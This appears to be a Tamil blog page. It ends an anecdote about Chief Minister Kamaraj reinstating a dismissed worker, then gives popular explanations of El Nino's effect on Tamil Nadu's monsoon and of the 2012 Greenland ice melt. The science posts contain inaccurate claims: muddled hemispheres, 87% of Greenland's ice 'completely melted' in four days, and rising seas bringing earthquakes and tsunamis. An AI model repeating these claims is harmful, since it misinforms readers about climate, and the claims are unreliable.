மண்ணாங்கட்டியை முதுகில் தட்டிக்கொடுத்து முகத்தையே உற்றுப்பார்த்த முதல்வர் காமராஜ், பட்டென்று கையெடுத்து கும்பிட்டு ‘நான் தப்புபன்னிட்டன். தெரியாம செய்திட்டன். மன்னிச்சுடு. அந்த தவறை நீதான் புரியவைச்சே...ரெண்டு நாளா உங்கவீட்ல சோறுதண்ணியில்லியாமே.
சமைக்கலயாமே....உங்களுக்கு ரெண்டு பொம்பள புள்ளைங்க...எல்லாத்தையும் இப்பதான் தெரிஞ்சுகிட்டேன்..எவ்வளவு பெரிய தப்பு செய்திருக்கேன்.. நான் அப்படி ஒரு உத்தரவு போட்டிருக்ககூடாது. ‘இனிமே புதிதாக வேலைக்கு வருபவர்களுக்கு எழுத படிக்க தெரிந்திருக்க வேண்டும்’னு போட்டிருக்க வேண்டும். நான் செய்தது
தவறுதான் என்று தட்டிக்கொடுத்து ஆதறவு சொல்ல மண்ணாங்கட்டி கதறி அழுகிறார். காமராஜருக்கும் பேச்சு இல்லை...

அடுத்து அங்கேயே ஒரு உத்தரவு தயாராகிறது. காமராஜர் கையொப்பமிடுகிறார். மண்ணாங்கட்டிக்கு மீண்டும் அரசு வேலை. அதிகாரிகளை பார்த்து ‘இவரை அழைத்துக்கொண்டு போங்க. வேலை கொடுத்தாச்சு. இனி கவலைப்பாதீங்கன்னு அவரோட மனைவி, குழைந்தைங்ககிட்ட சொல்லுங்க’ன்னு அதிகார குரலில் உத்தரவிடுகிறார். பிறகென்ன நினைத்தாரோ சற்று தயங்கி ’போகிறபோது வெறும் கையோட போகாதீங்க. ஓட்டல்ல எல்லாருக்கும் சாப்பாடு வாங்கிட்டு போய் கொடுங்க. ரெண்டு நாளா அவர்கள் சாப்பிட்டிருக்க மாட்டர்கள்’ என கண்டிப்போடு கூறுகிறார் அந்த அதிகாரிகளிடம்.

மண்ணாங்கட்டிக்கு பேச வார்த்தைகளின்றி கையெடுத்து கும்பிட்டபடியே வெளியேற, முதர்வர் காமராஜரும் எழுந்தது கையெழத்து கும்பிட்டபடியே அனுப்பிவைத்தார்.

ஒரு ஏழையின் கண்ணீர் வலி..இன்னொரு ஏழைக்குத்தான் தெரியும். ஆமாம் காமராஜர் ஏழையாகவே, எழைகளுக்காகவே இருந்தார்...

El Nino Danger

உலக வெப்பமயம் ஆகுதல் ஒரு புறம் இருந்தாலும் எல் நைனோ (El Nino) பிரச்சினையால் இந்தியாவில் பெய்ய வேண்டிய பருவ மழை இந்த வருடம் பெரிய கேள்விக்குறி என ஆரய்ச்சி கூறுகிறது. இது வரை பெய்ய வேண்டிய 8.3% மழைக்கு பதில் 4.05% சதவிகிதம் தான் பெய்திருக்கிறது தமிழகம் மற்றும் தென் மாவட்டங்களில். இது எதனால் என்று பார்க்க போகிறோம்.

எல் நைனோ என்றால் என்ன? நன்கு தெரிந்தவர்கள் கீழே உள்ள உலக அதிசியம் கிரின் லேன்ட்டில் நடந்திருக்கும் விஷயத்தை படியுங்கள் தெரியாதவர்கள் முழுவதும் படிக்கவும். எல் நைனோ என்பது பூமியின் நில நடுக்கோட்ட்டுக்கு கீழ் நடக்கும் பருவ மாற்றம் அதுவும் பசிஃபிக் ஓஷன் பகுதியில் நடக்கும் தற்காலிக மாற்றம் தான் எல் நைனோ. அதாவது இது பூமியிலும் வான்வெளியிலும் இதன் தாக்கம் தெரியும். அதாவது வட ஹெமிஸ்பியரின் (Northen Hemisphere) குளிர் காலத்தின் போது கடல் வெப்பம் சில டிகிரிகள் அதிகரிக்கும். அப்போது இடி மின்னல் மெதுவாக கிழக்கு நோக்கி நில நடுக்கோடில் அருகே வரும். பசிஃபிக் ஓஷனில் (Pacific Ocean) கிழக்கில் இருந்து மேற்கு நோக்கி வரும் அசுர காற்றும் காற்றுடன் கூடிய டிப்ரஷனும். அதனால் மேற்கு கடற்பரப்பில் கடல் சுமார் அரை மீட்டர் அளவுக்கு உயரம் கானும். அதனால் இதை சமம் செய்ய கிழக்கு கடலானது கீழ் இருந்து மேற்கில் உள்ள தண்ணிரை இழுக்கும். இது எப்படி என்றால் கிழக்கில் 20 - 22 டிகிரி தான் தண்ணீர் இருக்கும் ஆனால் மேற்கு கடல் பரப்பு சுமார் 30 டிகிரி வரை இருக்கும். எல் நைனோவினால் இந்த காற்று பலமாக அடிக்கபட்டு காற்று இந்த மேற்கு நோக்கி வந்த தண்ணீரானது திரும்பவும் கிழக்கு நோக்கி செல்லும். இதன் தொடற்ச்சி செய்கையால் கீழ் இருக்கும் குளிர் நீர் மாறி மாறி பசிஃபிக் கடலானது மிகுந்த வெப்பம் அதிகரிக்கும். இதனால் இந்த காற்றானது பருவ மழை மேகங்களை சிதைத்து மழையை அங்கும் இங்கும் சிதற வைக்கும் அப்படி சிதறிய மேகங்களின் அதிக அளவு மழை கடலில் பெய்து வீனாகும்.பொதுவாக இந்த நிகழ்வு மூன்றிலிருந்து ஏழு வருடத்திற்க்குள் வரும் என தெரிகிறது. இந்த வருட எல் நைனோ நிகழ்வால் பாதிப்பு வடக்கு ஹெமிஸ்பியரில் உள்ள தமிழகம் மற்றும் தென் மாவட்டங்கள் மற்றும் அமெரிக்கா வரை உள்ள தெற்கு கெஹிஸ்பியர் இடங்கள் பாதிக்கும். இதன் தாக்கம் ஏறகனவே அமெரிக்கவின் அதி வெப்பம் இந்த சம்மரில் தாங்க முடியாமல் பலர் இறந்தனர். இந்த எல் நைனோ 2012 அமெரிக்கா, சைனா, ஜப்பான், ஐரோப்பா ஆகிய இடத்தில் மிகுந்த மழை அங்கு போகும் அதனால் பல நாட்டில் வெள்ளகாடாகும் அதே சமயம் அங்குள்ள காய்ந்த பூமிகள் திருபவும் விவசாயத்திற்க்கு ஏதுவாகும் நல்ல விஷயமும் அவர்களுக்கு் இருக்கிறது.

தமிழகத்தில் மட்டும் என்னதான் மழைபெஞ்சாலும் ரெண்டு நாள்ல ஊரெல்லாம் வெள்ளகாடு ஆனால் அதுக்கு அடுத்த இரண்டு வாரத்தில தண்ணீர் பஞ்சம் இதுதான் இந்தியா அதுவும் தமிழகம் தான் அதிகம் பாதிக்கபடும் மானிலம் ஏன் என்றால் நம்மிடம் இருக்கும் ரிசர்வாயர்கள் தொடர்ந்து தண்ணீர் வெறும் 121 நாட்கள் மட்டும் தான் தரமுடியும். அதனால் தமிழகத்திற்க்கு இந்த நவம்பரில் இருந்து அடுத்த ஜூன் வரை தண்ணீர் பஞ்சம் வரும் என தெரிகிறது.





கிரின் லான்டில் ஒரு மிகுந்த அதிர்ச்சி நிகழ்வு நடந்திருக்கிறது. இந்த நாட்டில் முதல் படத்தில் உள்ள (ஜூலை 4) ஒரு 87% சதவிகித பனி நாலே நாட்களில் *ஜூலை 12க்குள்) முற்றிலும் உருகிவிட்டது. 40% சதம் உருகக்கூடிய ஒரு பனிப்பரப்பு 90% சதவிகிதம் மாறிய நிகழ்ச்சி முப்பது வருட சாட்டிலைட் கன்கானிப்பில் நிகழ்ந்ததே இல்லை. ஆனால் ஆராய்ச்சியாளர்கள் இது 150 வருடத்திற்க்கு ஒரு முறை நடக்ககூடிய நிகழ்வு கடைசியாக 1889 ஆம் ஆண்டு இந்த மாதிரி ஆகியது என கூறியிருக்கின்றனர். ஆனால் இதே மாதிரி அடுத்த வரும் வருடங்களில் நிகழ்ந்தால் அது உலக வெப்பமயற்றை மிகுந்த பிரச்சினையை உருவாக்கும் என கூறியிருக்கின்றனர். இது மனிதர்களின் அறிவியல் சாதனை ஆம் பூமி வெப்பமயம் என்பதை இந்த மனிதர்கள் தான் செய்திருக்கின்றனர் அது போக கடலின் மட்டமும் அதிகரித்து கொண்டே செல்கிறது என்பது மிகுந்த உண்மை. இதனால் பூமி நில நடுக்கம் மற்றும் சுனாமியால் ஜப்பான் போன்ற பல தீவு நாடுகள் காணமல் போகும் அபாயமும் உண்டு.